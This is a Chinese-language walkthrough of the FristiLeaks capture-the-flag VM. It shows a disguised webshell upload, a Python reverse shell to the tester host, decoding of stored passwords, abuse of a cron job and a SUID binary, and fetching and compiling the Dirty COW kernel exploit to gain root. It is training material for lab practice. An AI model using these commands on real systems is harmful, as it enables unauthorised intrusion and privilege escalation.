本文內容純屬虛構，B站攻略鴨求關注點贊支持！

測試機地址：192.168.31.196

根據(jù)靶機描述將MAC地址配置為08:00:27:A5:A6:76，開機后得到靶機地址：192.168.31.123

（配置虛擬機的MAC地址方法：虛擬機設置->網絡適配器->高級->MAC地址）

外部信息收集

端口掃描

Nmap結果：

80/tcp open ?Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
|_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
robots.txt：/cola /sisi /beer
| http-methods:
| ? Supported Methods: GET HEAD POST OPTIONS TRACE
|_ ?Potentially risky methods: TRACE

80端口

頁面源代碼沒敏感內容

打開三個目錄后頁面源代碼中只有地址/images/3037440.jpg

目錄枚舉

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.31.123/FUZZ

沒內容

漏洞利用

隱寫信息泄露

看別人博客發(fā)現(xiàn)/fristi/有個登錄框

頁面源代碼的注釋中發(fā)現(xiàn)用戶名eezeepz和

<!--
iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx
jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl
S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw
B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f
m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ
Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb
DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd
jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU
12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5
uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1
04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq
i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg
tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws
30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl
3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK
ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q
mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34
rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe
EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH
AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk
CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR
U5ErkJggg==
-->

解析base64編碼的圖片得到字符串keKkeKKeKKeKkEkkEk

測試登錄框：

http://192.168.31.123/fristi/checklogin.php

POST /fristi/checklogin.php HTTP/1.1

myusername=test1&mypassword=test2&Submit=Login

返回

Wrong Username or Password

未發(fā)現(xiàn)登錄失敗處理，嘗試賬號枚舉失敗

嘗試eezeepz:keKkeKKeKKeKkEkkEk登錄成功，發(fā)現(xiàn)有上傳圖片功能。

文件上傳

提交正常圖片white-wolf-wizard.jpg后，返回說文件提交到了/uploads

嘗試訪問http://192.168.31.123/fristi/uploads/，返回no

訪問white-wolf-wizard.jpg

上傳冰蝎馬，提示只可以png,jpg,gif

已知服務器中間件版本，嘗試上傳http://192.168.31.123/fristi/uploads/shell.php.jpg成功

>id
uid=48(apache) gid=48(apache) groups=48(apache)

測試機端nc -nvlp 443，冰蝎命令執(zhí)行

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.31.196",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
成功
python -c 'import pty;pty.spawn("/bin/bash")'
echo $-

權限提升

以apache用戶收集信息

cat /etc/passwd
eezeepz:x:500:500::/home/eezeepz:/bin/bash
admin:x:501:501::/home/admin:/bin/bash
fristigod:x:502:502::/var/fristigod:/bin/bash
fristi:x:503:100::/var/www:/sbin/nologin

OS: Linux version 2.6.32-573.8.1.el6.x86_64 (mockbuild@c6b8.bsys.dev.centos.org)
(gcc version 4.4.7 20120313 (Red Hat 4.4.7-16) (GCC) ) #1 SMP Tue Nov 10 18:01:38 UTC 2015
gcc.x86_64 ? ?4.4.7-16.el6

查看計劃任務：

ls -al /etc/cron*

/etc/cron.d/0hourly:
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/
01 * * * * root run-parts /etc/cron.hourly


/etc/cron.hourly/0anacron:
cat /etc/cron.hourly/0anacron
#!/bin/bash
# Skip excecution unless the date has changed from the previous run
if test -r /var/spool/anacron/cron.daily; then
? ?day=`cat /var/spool/anacron/cron.daily`
fi
if [ `date +%Y%m%d` = "$day" ]; then
? ?exit 0;
fi

# Skip excecution unless AC powered
if test -x /usr/bin/on_ac_power; then
? ?/usr/bin/on_ac_power &> /dev/null
? ?if test $? -eq 1; then
? ?exit 0
? ?fi
fi
/usr/sbin/anacron -s

ls -al /usr/sbin/anacron
-rwxr-xr-x. 1 root root 38968 Nov 10 ?2015 /usr/sbin/anacron

/var/spool/anacron:
-rw-------. 1 root root ? ?9 Dec ?5 05:22 cron.daily
-rw-------. 1 root root ? ?9 Dec ?5 06:02 cron.monthly
-rw-------. 1 root root ? ?9 Dec ?5 05:42 cron.weekly
無內容


ls -al /var/spool/cron
-rw------- ?1 admin ? ?admin ? 49 Nov 18 ?2015 admin
無權限

Sudo version 1.8.6p3

SELinux status:disabled

mysql ?Ver 14.14 Distrib 5.1.73

數(shù)據(jù)庫：

cat /var/www/html/fristi/checklogin.php
$host="localhost"
$username="eezeepz"; // Mysql username
$password="4ll3maal12#"; // Mysql password
$db_name="hackmenow"; // Database name
$tbl_name="members"; // Table name

mysql -h localhost -u eezeepz -p 4ll3maal12
登錄失敗

查郵件

ls -al /var/mail/
ls -al /var/spool/mail/

無權限且大小都為0

cat /var/www/notes.txt
hey eezeepz your homedir is a mess, go clean it up, just dont delete
the important stuff.
-jerry


/home/eezeepz
ls -al
...
-r--r--r--. 1 eezeepz eezeepz ? ?514 Nov 18 ?2015 notes.txt
...

cat notes.txt
Yo EZ,

I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/

Don't forget to specify the full path for each binary!

Just put a file called "runthis" in /tmp/, each line one command. The
output goes to the file "cronresult" in /tmp/. It should
run every minute with my account privileges.

\- Jerry

注意到在/tmp/下創(chuàng)建runthis，會以admin用戶運行

SUID提權

嘗試

echo "chmod -R 777 /home/admin" >/tmp/runthis無法執(zhí)行
echo "/bin/chmod -R 477 /home/admin" >/tmp/runthis無法執(zhí)行
返回：command did not start with /home/admin or /usr/bin

echo "/usr/bin/../../bin/chmod -R 777 /home/admin" >/tmp/runthis可以執(zhí)行
(/usr/bin/下面沒有chmod)

找哪些屬于admin的文件

find / -user admin 2>/dev/null
/home/admin
/home/admin/df
/home/admin/cat
/home/admin/chmod
/home/admin/cryptedpass.txt
/home/admin/.bash_logout
/home/admin/.bashrc
/home/admin/echo
/home/admin/egrep
/home/admin/ps
/home/admin/cryptpass.py
/home/admin/.bash_profile
/home/admin/grep
/home/admin/cronjob.py
/var/spool/mail/admin
/tmp/cronresult

cryptedpass.txt
mVGZ3O3omkJLmy2pcuTq

whoisyourgodnow.txt
=RFn0AKnlMHMPIzpyuTI0ITG

cryptpass.py
import base64,codecs,sys

def encodeString(str):
? ?base64string= base64.b64encode(str)
? ?return codecs.encode(base64string[::-1], 'rot13')

cryptoResult=encodeString(sys.argv[1])
print cryptoResult

先base64編碼，后反轉字符串，再rot13編碼。

改寫為解密腳本decryptpass.py

import base64,codecs,sys

def decodeString(str):
? ?rot13string=codecs.encode(str[::-1], 'rot13')
? ?explicit= base64.b64decode(rot13string)
? ?return explicit

cryptedpass='mVGZ3O3omkJLmy2pcuTq'
whoisyourgodnow='=RFn0AKnlMHMPIzpyuTI0ITG'

print ("cryptedpass: ",str(decodeString(cryptedpass),encoding='utf-8'))
print ("whoisyourgodnow: ",str(decodeString(whoisyourgodnow),encoding='utf-8'))$ python decryptpass.py
cryptedpass: ?thisisalsopw123
whoisyourgodnow: ?LetThereBeFristi!

su fristigod
Password: LetThereBeFristi!

根據(jù)passwd文件中：fristigod:x:502:502::/var/fristigod:/bin/bash
cd /var/fristigod
ls -al
-rw------- ? 1 fristigod fristigod ?864 Nov 25 ?2015 .bash_history
drwxrwxr-x. ?2 fristigod fristigod 4096 Nov 25 ?2015 .secret_admin_stuff

cat .bash_history
ls
pwd
ls -lah
cd .secret_admin_stuff/
ls
./doCom
./doCom test
sudo ls
exit
cd .secret_admin_stuff/
ls
./doCom
sudo -u fristi ./doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo /var/fristigod/.secret_admin_stuff/doCom
exit
sudo /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
groups
ls -lah
usermod -G fristigod fristi
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
less /var/log/secure e
Fexit
exit
exit

看出可以通過sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom執(zhí)行root命令

cd .secret_admin_stuff
ls -al
**-rwsr-sr-x** ?1 root ? ? ?root ? ? ?7529 Nov 25 ?2015 doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash
[sudo] password for fristigod: LetThereBeFristi!
\# id
uid=0(root) gid=100(users) groups=100(users),502(fristigod)

內核提權

測試機：

$ cp /usr/share/exploitdb/exploits/linux/local/40839.c .
$ python -m http.server 8080

靶機：

cd /tmp
wget 192.168.31.196:8080/40839.c
gcc -pthread 40839.c -o dirty -lcrypt
./dirty 123456qaz

結果：

firefart:fire86WDPZnrM:0:0:pwned:/root:/bin/bash
mmap: 7ff3e25bd000
madvise 0
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '123456qaz'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd

$ su firefart
Password: 123456qaz

# id
uid=0(firefart) gid=0(root) groups=0(root)

其他

cat /var/spool/cron
* * * * * /usr/bin/python /home/admin/cronjob.py

cat /etc/sudoers
fristigod ALL=(fristi:ALL) /var/fristigod/.secret_admin_stuff/doCom

# cat /root/fristileaks_secrets.txt
cat /root/fristileaks_secrets.txt
Flag: Y0u_kn0w_y0u_l0ve_fr1st1

沒猜到fristi目錄，當時沒法翻譯這個單詞，后來查了下是個飲料的名字

本文未經作者同意禁止轉載！

文中所涉及的技術、思路和工具僅供以安全為目的的學習交流使用，任何人不得將其用于非法用途以及盈利等目的，否則后果自行承擔！